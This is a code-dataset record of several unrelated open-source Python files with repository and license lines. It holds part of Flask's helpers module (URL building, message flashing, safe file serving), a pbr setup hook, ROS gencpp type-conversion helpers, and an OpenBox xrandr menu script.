:param _method: if provided this explicitly specifies an HTTP method.
"""
appctx = _app_ctx_stack.top
reqctx = _request_ctx_stack.top
if appctx is None:
raise RuntimeError('Attempted to generate a URL without the '
'application context being pushed. This has to be '
'executed when application context is available.')
# If request specific information is available we have some extra
# features that support "relative" urls.
if reqctx is not None:
url_adapter = reqctx.url_adapter
blueprint_name = request.blueprint
if not reqctx.request._is_old_module:
if endpoint[:1] == '.':
if blueprint_name is not None:
endpoint = blueprint_name + endpoint
else:
endpoint = endpoint[1:]
else:
# TODO: get rid of this deprecated functionality in 1.0
if '.' not in endpoint:
if blueprint_name is not None:
endpoint = blueprint_name + '.' + endpoint
elif endpoint.startswith('.'):
endpoint = endpoint[1:]
external = values.pop('_external', False)
# Otherwise go with the url adapter from the appctx and make
# the urls external by default.
else:
url_adapter = appctx.url_adapter
if url_adapter is None:
raise RuntimeError('Application was not able to create a URL '
'adapter for request independent URL generation. '
'You might be able to fix this by setting '
'the SERVER_NAME config variable.')
external = values.pop('_external', True)
anchor = values.pop('_anchor', None)
method = values.pop('_method', None)
scheme = values.pop('_scheme', None)
appctx.app.inject_url_defaults(endpoint, values)
if scheme is not None:
if not external:
raise ValueError('When specifying _scheme, _external must be True')
url_adapter.url_scheme = scheme
try:
rv = url_adapter.build(endpoint, values, method=method,
force_external=external)
except BuildError as error:
# We need to inject the values again so that the app callback can
# deal with that sort of stuff.
values['_external'] = external
values['_anchor'] = anchor
values['_method'] = method
return appctx.app.handle_url_build_error(error, endpoint, values)
if anchor is not None:
rv += '#' + url_quote(anchor)
return rv
def get_template_attribute(template_name, attribute):
"""Loads a macro (or variable) a template exports. This can be used to
invoke a macro from within Python code. If you for example have a
template named `_cider.html` with the following contents:
.. sourcecode:: html+jinja
{% macro hello(name) %}Hello {{ name }}!{% endmacro %}
You can access this from Python code like this::
hello = get_template_attribute('_cider.html', 'hello')
return hello('World')
.. versionadded:: 0.2
:param template_name: the name of the template
:param attribute: the name of the variable of macro to access
"""
return getattr(current_app.jinja_env.get_template(template_name).module,
attribute)
def flash(message, category='message'):
"""Flashes a message to the next request. In order to remove the
flashed message from the session and to display it to the user,
the template has to call :func:`get_flashed_messages`.
.. versionchanged:: 0.3
`category` parameter added.
:param message: the message to be flashed.
:param category: the category for the message. The following values
are recommended: ``'message'`` for any kind of message,
``'error'`` for errors, ``'info'`` for information
messages and ``'warning'`` for warnings. However any
kind of string can be used as category.
"""
# Original implementation:
#
# session.setdefault('_flashes', []).append((category, message))
#
# This assumed that changes made to mutable structures in the session are
# are always in sync with the sess on object, which is not true for session
# implementations that use external storage for keeping their keys/values.
flashes = session.get('_flashes', [])
flashes.append((category, message))
session['_flashes'] = flashes
message_flashed.send(current_app._get_current_object(),
message=message, category=category)
def get_flashed_messages(with_categories=False, category_filter=[]):
"""Pulls all flashed messages from the session and returns them.
Further calls in the same request to the function will return
the same messages. By default just the messages are returned,
but when `with_categories` is set to `True`, the return value will
be a list of tuples in the form ``(category, message)`` instead.
Filter the flashed messages to one or more categories by providing those
categories in `category_filter`. This allows rendering categories in
separate html blocks. The `with_categories` and `category_filter`
arguments are distinct:
* `with_categories` controls whether categories are returned with message
text (`True` gives a tuple, where `False` gives just the message text).
* `category_filter` filters the messages down to only those matching the
provided categories.
See :ref:`message-flashing-pattern` for examples.
.. versionchanged:: 0.3
`with_categories` parameter added.
.. versionchanged:: 0.9
`category_filter` parameter added.
:param with_categories: set to `True` to also receive categories.
:param category_filter: whitelist of categories to limit return values
"""
flashes = _request_ctx_stack.top.flashes
if flashes is None:
_request_ctx_stack.top.flashes = flashes = session.pop('_flashes') \
if '_flashes' in session else []
if category_filter:
flashes = list(filter(lambda f: f[0] in category_filter, flashes))
if not with_categories:
return [x[1] for x in flashes]
return flashes
def send_file(filename_or_fp, mimetype=None, as_attachment=False,
attachment_filename=None, add_etags=True,
cache_timeout=None, conditional=False):
"""Sends the contents of a file to the client. This will use the
most efficient method available and configured. By default it will
try to use the WSGI server's file_wrapper support. Alternatively
you can set the application's :attr:`~Flask.use_x_sendfile` attribute
to ``True`` to directly emit an `X-Sendfile` header. This however
requires support of the underlying webserver for `X-Sendfile`.
By default it will try to guess the mimetype for you, but you can
also explicitly provide one. For extra security you probably want
to send certain files as attachment (HTML for instance). The mimetype
guessing requires a `filename` or an `attachment_filename` to be
provided.
Please never pass filenames to this function from user sources without
checking them first. Something like this is usually sufficient to
avoid security problems::
if '..' in filename or filename.startswith('/'):
abort(404)
.. versionadded:: 0.2
.. versionadded:: 0.5
The `add_etags`, `cache_timeout` and `conditional` parameters were
added. The default behavior is now to attach etags.
.. versionchanged:: 0.7
mimetype guessing and etag support for file objects was
deprecated because it was unreliable. Pass a filename if you are
able to, otherwise attach an etag yourself. This functionality
will be removed in Flask 1.0
.. versionchanged:: 0.9
cache_timeout pulls its default from application config, when None.
:param filename_or_fp: the filename of the file to send. This is
relative to the :attr:`~Flask.root_path` if a
relative path is specified.
Alternatively a file object might be provided
in which case `X-Sendfile` might not work and
fall back to the traditional method. Make sure
that the file pointer is positioned at the start
of data to send before calling :func:`send_file`.
:param mimetype: the mimetype of the file if provided, otherwise
auto detection happens.
:param as_attachment: set to `True` if you want to send this file with
a ``Content-Disposition: attachment`` header.
:param attachment_filename: the filename for the attachment if it
differs from the file's filename.
:param add_etags: set to `False` to disable attaching of etags.
:param conditional: set to `True` to enable conditional responses.
:param cache_timeout: the timeout in seconds for the headers. When `None`
(default), this value is set by
:meth:`~Flask.get_send_file_max_age` of
:data:`~flask.current_app`.
"""
mtime = None
if isinstance(filename_or_fp, string_types):
filename = filename_or_fp
file = None
else:
from warnings import warn
file = filename_or_fp
filename = getattr(file, 'name', None)
# XXX: this behavior is now deprecated because it was unreliable.
# removed in Flask 1.0
if not attachment_filename and not mimetype \
and isinstance(filename, string_types):
warn(DeprecationWarning('The filename support for file objects '
'passed to send_file is now deprecated. Pass an '
'attach_filename if you want mimetypes to be guessed.'),
stacklevel=2)
if add_etags:
warn(DeprecationWarning('In future flask releases etags will no '
'longer be generated for file objects passed to the send_file '
'function because this behavior was unreliable. Pass '
'filenames instead if possible, otherwise attach an etag '
'yourself based on another value'), stacklevel=2)
if filename is not None:
if not os.path.isabs(filename):
filename = os.path.join(current_app.root_path, filename)
if mimetype is None and (filename or attachment_filename):
mimetype = mimetypes.guess_type(filename or attachment_filename)[0]
if mimetype is None:
mimetype = 'application/octet-stream'
headers = Headers()
if as_attachment:
if attachment_filename is None:
if filename is None:
raise TypeError('filename unavailable, required for '
'sending as attachment')
attachment_filename = os.path.basename(filename)
headers.add('Content-Disposition', 'attachment',
filename=attachment_filename)
if current_app.use_x_sendfile and filename:
if file is not None:
file.close()
headers['X-Sendfile'] = filename
headers['Content-Length'] = os.path.getsize(filename)
data = None
else:
if file is None:
file = open(filename, 'rb')
mtime = os.path.getmtime(filename)
headers['Content-Length'] = os.path.getsize(filename)
data = wrap_file(request.environ, file)
rv = current_app.response_class(data, mimetype=mimetype, headers=headers,
direct_passthrough=True)
# if we know the file modification date, we can store it as the
# the time of the last modification.
if mtime is not None:
rv.last_modified = int(mtime)
rv.cache_control.public = True
if cache_timeout is None:
cache_timeout = current_app.get_send_file_max_age(filename)
if cache_timeout is not None:
rv.cache_control.max_age = cache_timeout
rv.expires = int(time() + cache_timeout)
if add_etags and filename is not None:
rv.set_etag('flask-%s-%s-%s' % (
os.path.getmtime(filename),
os.path.getsize(filename),
adler32(
filename.encode('utf-8') if isinstance(filename, text_type)
else filename
) & 0xffffffff
))
if conditional:
rv = rv.make_conditional(request)
# make sure we don't send x-sendfile for servers that
# ignore the 304 status code for x-sendfile.
if rv.status_code == 304:
rv.headers.pop('x-sendfile', None)
return rv
def safe_join(directory, filename):
"""Safely join `directory` and `filename`.
Example usage::
@app.route('/wiki/<path:filename>')
def wiki_page(filename):
filename = safe_join(app.config['WIKI_FOLDER'], filename)
with open(filename, 'rb') as fd:
content = fd.read() # Read and process the file content...
:param directory: the base directory.
:param filename: the untrusted filename relative to that directory.
:raises: :class:`~werkzeug.exceptions.NotFound` if the resulting path
would fall out of `directory`.
"""
filename = posixpath.normpath(filename)
for sep in _os_alt_seps:
if sep in filename:
raise NotFound()
if os.path.isabs(filename) or \
filename == '..' or \
filename.startswith('../'):
raise NotFound()
return os.path.join(directory, filename)
def send_from_directory(directory, filename, **options):
"""Send a file from a given directory with :func:`send_file`. This
is a secure way to quickly expose static files from an upload folder
or something similar.
Example usage::
@app.route('/uploads/<path:filename>')
def download_file(filename):
return send_from_directory(app.config['UPLOAD_FOLDER'],
filename, as_attachment=True)
.. admonition:: Sending files and Performance
It is strongly recommended to activate either `X-Sendfile` support in
your webserver or (if no authentication happens) to tell the webserver
to serve files for the given path on its own without calling into the
web application for improved performance.
.. versionadded:: 0.5
:param directory: the directory where all the files are stored.
:param filename: the filename relative to that directory to
download.
:param options: optional keyword arguments that are directly
forwarded to :func:`send_file`.
"""
filename = safe_join(directory, filename)
if not os.path.isfile(filename):
raise NotFound()
options.setdefault('conditional', True)
return send_file(filename, **options)
def get_root_path(import_name):
"""Returns the path to a package or cwd if that cannot be found. This
returns the path of a package or the folder that contains a module.
Not to be confused with the package path returned by :func:`find_package`.
"""
# Module already imported and has a file attribute. Use that first.
mod = sys.modules.get(import_name)
if mod is not None and hasattr(mod, '__file__'):
return os.path.dirname(os.path.abspath(mod.__file__))
# Next attempt: check the loader.
loader = pkgutil.get_loader(import_name)
# Loader does not exist or we're referring to an unloaded main module
# or a main module without path (interactive sessions), go with the
# current working directory.
if loader is None or import_name == '__main__':
return os.getcwd()
# For .egg, zipimporter does not have get_filename until Python 2.7.
# Some other loaders might exhibit the same behavior.
if hasattr(loader, 'get_filename'):
filepath = loader.get_filename(import_name)
else:
# Fall back to imports.
__import__(import_name)
filepath = sys.modules[import_name].__file__
# filepath is import_name.py for a module, or __init__.py for a package.
return os.path.dirname(os.path.abspath(filepath))
def find_package(import_name):
"""Finds a package and returns the prefix (or None if the package is
not installed) as well as the folder that contains the package or
module as a tuple. The package path returned is the module that would
have to be added to the pythonpath in order to make it possible to
import the module. The prefix is the path below which a UNIX like
folder structure exists (lib, share etc.).
"""
root_mod_name = import_name.split('.')[0]
loader = pkgutil.get_loader(root_mod_name)
if loader is None or import_name == '__main__':
# import name is not found, or interactive/main module
package_path = os.getcwd()
else:
# For .egg, zipimporter does not have get_filename until Python 2.7.
if hasattr(loader, 'get_filename'):
filename = loader.get_filename(root_mod_name)
elif hasattr(loader, 'archive'):
# zipimporter's loader.archive points to the .egg or .zip
# archive filename is dropped in call to dirname below.
filename = loader.archive
else:
# At least one loader is missing both get_filename and archive:
# Google App Engine's HardenedModulesHook
#
# Fall back to imports.
__import__(import_name)
filename = sys.modules[import_name].__file__
package_path = os.path.abspath(os.path.dirname(filename))
# package_path ends with __init__.py for a package
if loader.is_package(root_mod_name):
package_path = os.path.dirname(package_path)
site_parent, site_folder = os.path.split(package_path)
py_prefix = os.path.abspath(sys.prefix)
if package_path.startswith(py_prefix):
return py_prefix, package_path
elif site_folder.lower() == 'site-packages':
parent, folder = os.path.split(site_parent)
# Windows like installations
if folder.lower() == 'lib':
base_dir = parent
# UNIX like installations
elif os.path.basename(parent).lower() == 'lib':
base_dir = os.path.dirname(parent)
else:
base_dir = site_parent
return base_dir, package_path
return None, package_path
class locked_cached_property(object):
"""A decorator that converts a function into a lazy property. The
function wrapped is called the first time to retrieve the result
and then that calculated result is used the next time you access
the value. Works like the one in Werkzeug but has a lock for
thread safety.
"""
def __init__(self, func, name=None, doc=None):
self.__name__ = name or func.__name__
self.__module__ = func.__module__
self.__doc__ = doc or func.__doc__
self.func = func
self.lock = RLock()
def __get__(self, obj, type=None):
if obj is None:
return self
with self.lock:
value = obj.__dict__.get(self.__name__, _missing)
if value is _missing:
value = self.func(obj)
obj.__dict__[self.__name__] = value
return value
class _PackageBoundObject(object):
def __init__(self, import_name, template_folder=None):
#: The name of the package or module. Do not change this once
#: it was set by the constructor.
self.import_name = import_name
#: location of the templates. `None` if templates should not be
#: exposed.
self.template_folder = template_folder
#: Where is the app root located?
self.root_path = get_root_path(self.import_name)
self._static_folder = None
self._static_url_path = None
def _get_static_folder(self):
if self._static_folder is not None:
return os.path.join(self.root_path, self._static_folder)
def _set_static_folder(self, value):
self._static_folder = value
static_folder = property(_get_static_folder, _set_static_folder)
del _get_static_folder, _set_static_folder
def _get_static_url_path(self):
if self._static_url_path is None:
if self.static_folder is None:
return None
return '/' + os.path.basename(self.static_folder)
return self._static_url_path
def _set_static_url_path(self, value):
self._static_url_path = value
static_url_path = property(_get_static_url_path, _set_static_url_path)
del _get_static_url_path, _set_static_url_path
@property
def has_static_folder(self):
"""This is `True` if the package bound object's container has a
folder named ``'static'``.
.. versionadded:: 0.5
"""
return self.static_folder is not None
@locked_cached_property
def jinja_loader(self):
"""The Jinja loader for this package bound object.
.. versionadded:: 0.5
"""
if self.template_folder is not None:
return FileSystemLoader(os.path.join(self.root_path,
self.template_folder))
def get_send_file_max_age(self, filename):
"""Provides default cache_timeout for the :func:`send_file` functions.
By default, this function returns ``SEND_FILE_MAX_AGE_DEFAULT`` from
the configuration of :data:`~flask.current_app`.
Static file functions such as :func:`send_from_directory` use this
function, and :func:`send_file` calls this function on
:data:`~flask.current_app` when the given cache_timeout is `None`. If a
cache_timeout is given in :func:`send_file`, that timeout is used;
otherwise, this method is called.
This allows subclasses to change the behavior when sending files based
on the filename. For example, to set the cache timeout for .js files
to 60 seconds::
class MyFlask(flask.Flask):
def get_send_file_max_age(self, name):
if name.lower().endswith('.js'):
return 60
return flask.Flask.get_send_file_max_age(self, name)
.. versionadded:: 0.9
"""
return current_app.config['SEND_FILE_MAX_AGE_DEFAULT']
def send_static_file(self, filename):
"""Function used internally to send static files from the static
folder to the browser.
.. versionadded:: 0.5
"""
if not self.has_static_folder:
raise RuntimeError('No static folder for this object')
# Ensure get_send_file_max_age is called in all cases.
# Here, we ensure get_send_file_max_age is called for Blueprints.
cache_timeout = self.get_send_file_max_age(filename)
return send_from_directory(self.static_folder, filename,
cache_timeout=cache_timeout)
def open_resource(self, resource, mode='rb'):
"""Opens a resource from the application's resource folder. To see
how this works, consider the following folder structure::
/myapplication.py
/schema.sql
/static
/style.css
/templates
/layout.html
/index.html
If you want to open the `schema.sql` file you would do the
following::
with app.open_resource('schema.sql') as f:
contents = f.read()
do_something_with(contents)
:param resource: the name of the resource. To access resources within
subfolders use forward slashes as separator.
:param mode: resource file opening mode, default is 'rb'.
"""
if mode not in ('r', 'rb'):
raise ValueError('Resources can only be opened for reading')
return open(os.path.join(self.root_path, resource), mode)
|
apache-2.0
|
swarna-k/MyDiary
|
flask/lib/python2.7/site-packages/pbr/hooks/commands.py
|
10
|
2346
|
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from setuptools.command import easy_install
from pbr.hooks import base
from pbr import options
from pbr import packaging
class CommandsConfig(base.BaseConfig):
section = 'global'
def __init__(self, config):
super(CommandsConfig, self).__init__(config)
self.commands = self.config.get('commands', "")
def save(self):
self.config['commands'] = self.commands
super(CommandsConfig, self).save()
def add_command(self, command):
self.commands = "%s\n%s" % (self.commands, command)
def hook(self):
self.add_command('pbr.packaging.LocalEggInfo')
self.add_command('pbr.packaging.LocalSDist')
self.add_command('pbr.packaging.LocalInstallScripts')
self.add_command('pbr.packaging.LocalDevelop')
if os.name != 'nt':
easy_install.get_script_args = packaging.override_get_script_args
if packaging.have_sphinx():
self.add_command('pbr.builddoc.LocalBuildDoc')
self.add_command('pbr.builddoc.LocalBuildLatex')
if os.path.exists('.testr.conf') and packaging.have_testr():
# There is a .testr.conf file. We want to use it.
self.add_command('pbr.packaging.TestrTest')
elif self.config.get('nosetests', False) and packaging.have_nose():
# We seem to still have nose configured
self.add_command('pbr.packaging.NoseTest')
use_egg = options.get_boolean_option(
self.pbr_config, 'use-egg', 'PBR_USE_EGG')
# We always want non-egg install unless explicitly requested
if 'manpages' in self.pbr_config or not use_egg:
self.add_command('pbr.packaging.LocalInstall')
|
bsd-3-clause
|
Princeton-Quadcopter/PQ-Software
|
Ardupilot/mk/PX4/Tools/gencpp/src/gencpp/__init__.py
|
214
|
9473
|
# Software License Agreement (BSD License)
#
# Copyright (c) 2011, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import genmsg.msgs
try:
from cStringIO import StringIO #Python 2.x
except ImportError:
from io import StringIO #Python 3.x
MSG_TYPE_TO_CPP = {'byte': 'int8_t',
'char': 'uint8_t',
'bool': 'uint8_t',
'uint8': 'uint8_t',
'int8': 'int8_t',
'uint16': 'uint16_t',
'int16': 'int16_t',
'uint32': 'uint32_t',
'int32': 'int32_t',
'uint64': 'uint64_t',
'int64': 'int64_t',
'float32': 'float',
'float64': 'double',
'string': 'std::basic_string<char, std::char_traits<char>, typename ContainerAllocator::template rebind<char>::other > ',
'time': 'ros::Time',
'duration': 'ros::Duration'}
#used
def msg_type_to_cpp(type):
"""
Converts a message type (e.g. uint32, std_msgs/String, etc.) into the C++ declaration
for that type (e.g. uint32_t, std_msgs::String_<ContainerAllocator>)
@param type: The message type
@type type: str
@return: The C++ declaration
@rtype: str
"""
(base_type, is_array, array_len) = genmsg.msgs.parse_type(type)
cpp_type = None
if (genmsg.msgs.is_builtin(base_type)):
cpp_type = MSG_TYPE_TO_CPP[base_type]
elif (len(base_type.split('/')) == 1):
if (genmsg.msgs.is_header_type(base_type)):
cpp_type = ' ::std_msgs::Header_<ContainerAllocator> '
else:
cpp_type = '%s_<ContainerAllocator> '%(base_type)
else:
pkg = base_type.split('/')[0]
msg = base_type.split('/')[1]
cpp_type = ' ::%s::%s_<ContainerAllocator> '%(pkg, msg)
if (is_array):
if (array_len is None):
return 'std::vector<%s, typename ContainerAllocator::template rebind<%s>::other > '%(cpp_type, cpp_type)
else:
return 'boost::array<%s, %s> '%(cpp_type, array_len)
else:
return cpp_type
def _escape_string(s):
s = s.replace('\\', '\\\\')
s = s.replace('"', '\\"')
return s
def escape_message_definition(definition):
lines = definition.splitlines()
if not lines:
lines.append('')
s = StringIO()
for line in lines:
line = _escape_string(line)
s.write('%s\\n\\\n'%(line))
val = s.getvalue()
s.close()
return val
#used2
def cpp_message_declarations(name_prefix, msg):
"""
Returns the different possible C++ declarations for a message given the message itself.
@param name_prefix: The C++ prefix to be prepended to the name, e.g. "std_msgs::"
@type name_prefix: str
@param msg: The message type
@type msg: str
@return: A tuple of 3 different names. cpp_message_decelarations("std_msgs::", "String") returns the tuple
("std_msgs::String_", "std_msgs::String_<ContainerAllocator>", "std_msgs::String")
@rtype: str
"""
pkg, basetype = genmsg.names.package_resource_name(msg)
cpp_name = ' ::%s%s'%(name_prefix, msg)
if (pkg):
cpp_name = ' ::%s::%s'%(pkg, basetype)
return ('%s_'%(cpp_name), '%s_<ContainerAllocator> '%(cpp_name), '%s'%(cpp_name))
#todo
def is_fixed_length(spec, msg_context, includepath):
"""
Returns whether or not the message is fixed-length
@param spec: The message spec
@type spec: genmsg.msgs.MsgSpec
@param package: The package of the
@type package: str
"""
types = []
for field in spec.parsed_fields():
if (field.is_array and field.array_len is None):
return False
if (field.base_type == 'string'):
return False
if (not field.is_builtin):
types.append(field.base_type)
types = set(types)
for t in types:
t = genmsg.msgs.resolve_type(t, spec.package)
assert isinstance(includepath, dict)
new_spec = genmsg.msg_loader.load_msg_by_type(msg_context, t, includepath)
if (not is_fixed_length(new_spec, msg_context, includepath)):
return False
return True
#used2
def default_value(type):
"""
Returns the value to initialize a message member with. 0 for integer types, 0.0 for floating point, false for bool,
empty string for everything else
@param type: The type
@type type: str
"""
if type in ['byte', 'int8', 'int16', 'int32', 'int64',
'char', 'uint8', 'uint16', 'uint32', 'uint64']:
return '0'
elif type in ['float32', 'float64']:
return '0.0'
elif type == 'bool':
return 'false'
return ""
#used2
def takes_allocator(type):
"""
Returns whether or not a type can take an allocator in its constructor. False for all builtin types except string.
True for all others.
@param type: The type
@type: str
"""
return not type in ['byte', 'int8', 'int16', 'int32', 'int64',
'char', 'uint8', 'uint16', 'uint32', 'uint64',
'float32', 'float64', 'bool', 'time', 'duration']
def escape_string(str):
str = str.replace('\\', '\\\\')
str = str.replace('"', '\\"')
return str
#used
def generate_fixed_length_assigns(spec, container_gets_allocator, cpp_name_prefix):
"""
Initialize any fixed-length arrays
@param s: The stream to write to
@type s: stream
@param spec: The message spec
@type spec: genmsg.msgs.MsgSpec
@param container_gets_allocator: Whether or not a container type (whether it's another message, a vector, array or string)
should have the allocator passed to its constructor. Assumes the allocator is named _alloc.
@type container_gets_allocator: bool
@param cpp_name_prefix: The C++ prefix to use when referring to the message, e.g. "std_msgs::"
@type cpp_name_prefix: str
"""
# Assign all fixed-length arrays their default values
for field in spec.parsed_fields():
if (not field.is_array or field.array_len is None):
continue
val = default_value(field.base_type)
if (container_gets_allocator and takes_allocator(field.base_type)):
# String is a special case, as it is the only builtin type that takes an allocator
if (field.base_type == "string"):
string_cpp = msg_type_to_cpp("string")
yield ' %s.assign(%s(_alloc));\n'%(field.name, string_cpp)
else:
(cpp_msg_unqualified, cpp_msg_with_alloc, _) = cpp_message_declarations(cpp_name_prefix, field.base_type)
yield ' %s.assign(%s(_alloc));\n'%(field.name, cpp_msg_with_alloc)
elif (len(val) > 0):
yield ' %s.assign(%s);\n'%(field.name, val)
#used
def generate_initializer_list(spec, container_gets_allocator):
"""
Writes the initializer list for a constructor
@param s: The stream to write to
@type s: stream
@param spec: The message spec
@type spec: genmsg.msgs.MsgSpec
@param container_gets_allocator: Whether or not a container type (whether it's another message, a vector, array or string)
should have the allocator passed to its constructor. Assumes the allocator is named _alloc.
@type container_gets_allocator: bool
"""
op = ':'
for field in spec.parsed_fields():
val = default_value(field.base_type)
use_alloc = takes_allocator(field.base_type)
if (field.is_array):
if (field.array_len is None and container_gets_allocator):
yield ' %s %s(_alloc)'%(op, field.name)
else:
yield ' %s %s()'%(op, field.name)
else:
if (container_gets_allocator and use_alloc):
yield ' %s %s(_alloc)'%(op, field.name)
else:
yield ' %s %s(%s)'%(op, field.name, val)
op = ','
|
gpl-3.0
|
whiteinge/ob-randr
|
ob-randr.py
|
2
|
8035
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""A small utility to make xrandr adjustments from an OpenBox menu.
To install, put this file somewhere and make sure it is executable.
Edit your $HOME/.config/openbox/menu.xml file. Add something like the following
near the top::
<menu id="randr-menu" label="randr" execute="/path/to/ob-randr.py" />
Then add this in the place you actually want the menu to appear::
<menu id="randr-menu" />
You can easily add custom commands to the menu by creating the file
$HOME/.ob-randrrc. The syntax looks like this::
[Notebook]
portrait: --output LVDS --primary --mode 1366x768 --output VGA-0 --mode 1440x900 --left-of LVDS --rotate left
[Netbook]
zoom out: --output LVDS --scale 1.3x1.3
zoom in: --output LVDS --panning 1280x1024
The idea is that you can create machine-specific shortcuts. For example, with
my laptop at home I frequently connect to an external widescreen display turned
sideways. On my netbook, I frequently 'zoom out' to a higher resolution in
scaled-out mode or 'zoom in' to a higher resolution in panning mode.
TODO:
* Invoking position commands on a monitor that is turned off has no effect
* What other common tasks should be represented?
"""
AUTHOR = 'Seth House <[email protected]>, Petr Penzin <[email protected]>'
VERSION = '0.2'
import ConfigParser
import os
import subprocess
import sys
try:
from xml.etree import cElementTree as etree
except ImportError:
from xml.etree import ElementTree as etree
HOME = os.path.expanduser('~')
RCFILE = '.ob-randrrc'
def mk_exe_node(output, name, command):
"""A small helper to speed the three-element PITA that is the OpenBox
execute menu syntax.
"""
CMD = 'xrandr --output %s ' % output
item = etree.Element('item', label=name)
action = etree.SubElement(item, 'action', name='execute')
etree.SubElement(action, 'command').text = CMD + command
return item
def get_rc_menu():
"""Read the user's rc file and return XML for menu entries."""
config = ConfigParser.ConfigParser()
config.read(os.path.join(HOME, RCFILE))
menus = []
for i in config.sections():
menu = etree.Element('menu', id='shortcut-%s' % i, label=i)
for name in config.options(i):
command = config.get(i, name)
item = etree.SubElement(menu, 'item', label=name)
action = etree.SubElement(item, 'action', name='execute')
etree.SubElement(action, 'command').text = 'xrandr ' + command
menus.append(menu)
return menus
def mk_position_controls(output, name, action, outputs):
"""A helper function to generate a menu containing set of positional commands (left of, right of, above, below, etc).
"""
menu = etree.Element('menu', id=output+action,
type=action, label=name)
empty = True
# Add --auto to turn the screen on if it is off
if outputs[output]:
extra_action = ''
else:
extra_action = '--auto'
for other in outputs.keys():
# Don't position against itself
if output == other:
continue
# Don't position against an output that is off
if not outputs[other]:
continue
menu.append(mk_exe_node(output, other, ' '.join([extra_action, action, other])))
empty = False
if empty:
etree.SubElement(menu, 'separator', label="<none>")
return menu
def get_xml():
"""Run xrandr -q and parse the output for the bits we're interested in,
then build an XML tree suitable for passing to OpenBox.
"""
xrandr = subprocess.Popen(['xrandr', '-q'], stdout=subprocess.PIPE)
xrandr_lines = xrandr.stdout.readlines()
root = etree.Element('openbox_pipe_menu')
# Dictionary of connected outputs, key - output name, value - is it on
outputs = {}
actions = (
('right', '--rotate right'),
('left', '--rotate left'),
('inverted', '--rotate inverted'),
('normal', '--rotate normal'),
(),
('auto', '--auto'),
('off', '--off'),
('reset', ' '.join([
'--auto', '--rotate normal', '--scale 1x1', '--panning 0x0'])))
# The following string processing is far more verbose than necessary but if
# the xrandr output ever changes (or I simply got it wrong to begin with)
# this should make it easier to fix.
for i in xrandr_lines:
if ' current' in i:
# Screen 0: minimum 320 x 200, current 1700 x 1440, maximum 2048 x 2048
text = [j for j in i.split(',') if ' current' in j][0]
text = text.replace(' current ', '')
etree.SubElement(root, 'separator', label="Current: %s" % text)
elif ' connected' in i:
# VGA connected 900x1440+0+0 left (normal left inverted right x axis y axis) 408mm x 255mm
text = i.replace(' connected', '')
text = text.partition('(')[0]
text = text.strip()
try:
output, mode, extra = (lambda x: (x[0], x[1], x[2:]))(text.split(' '))
outputs[output] = True
except IndexError:
# LVDS connected (normal left inverted right x axis y axis)
# Display is connected but off. Is this the best place to check that?
output, mode, extra = text, 'off', ''
outputs[output] = False
node = etree.SubElement(root, 'menu', id=output, type='output',
label=' '.join([output, mode, ' '.join(extra)]))
modes = etree.SubElement(node, 'menu', id='%s-modes' % output,
type='modes', label='modes')
etree.SubElement(node, 'separator')
# Add a position menu, but fill in later
position = etree.SubElement(node, 'menu', id='%s-position' % output,
type='position', label='position')
etree.SubElement(node, 'separator')
# Grab all the available modes (I'm ignoring refresh rates for now)
for j in xrandr_lines[xrandr_lines.index(i) + 1:]:
if not j.startswith(' '):
break
# 1440x900 59.9*+ 59.9*
text = j.strip()
text = text.split(' ')[0]
modes.append(mk_exe_node(output, text, '--mode %s' % text))
for action in actions:
if not action:
etree.SubElement(node, 'separator')
else:
node.append(mk_exe_node(output, *action))
elif ' disconnected' in i:
# TV disconnected (normal left inverted right x axis y axis)
text = i.replace(' disconnected', '')
text = text.partition('(')[0]
name, extra = (lambda x: (x[0], x[1:]))(text.split(' '))
etree.SubElement(root, 'item', label=name)
# Grab the user's rc menu shortcuts
etree.SubElement(root, 'separator', label='Shortcuts')
auto = etree.SubElement(root, 'item', label='auto')
auto_action = etree.SubElement(auto, 'action', name='execute')
etree.SubElement(auto_action, 'command').text = 'xrandr --auto'
# Populate position menus
for output in outputs.keys():
# Find position entry
position = root.find(".//menu[@id=\"%s-position\"]" % output)
# Add position options
position.append(mk_position_controls(output, 'left of', '--left-of', outputs))
position.append(mk_position_controls(output, 'right of', '--right-of', outputs))
position.append(mk_position_controls(output, 'above', '--above', outputs))
position.append(mk_position_controls(output, 'below', '--below', outputs))
position.append(mk_position_controls(output, 'same as', '--same-as', outputs))
for i in get_rc_menu():
root.append(i)
return root
if __name__ == '__main__':
ob_menu = get_xml()
sys.stdout.write(etree.tostring(ob_menu) + '\n')
|
bsd-3-clause
|
shahar-stratoscale/nova
|
nova/cells/driver.py
|
126
|
1393
|
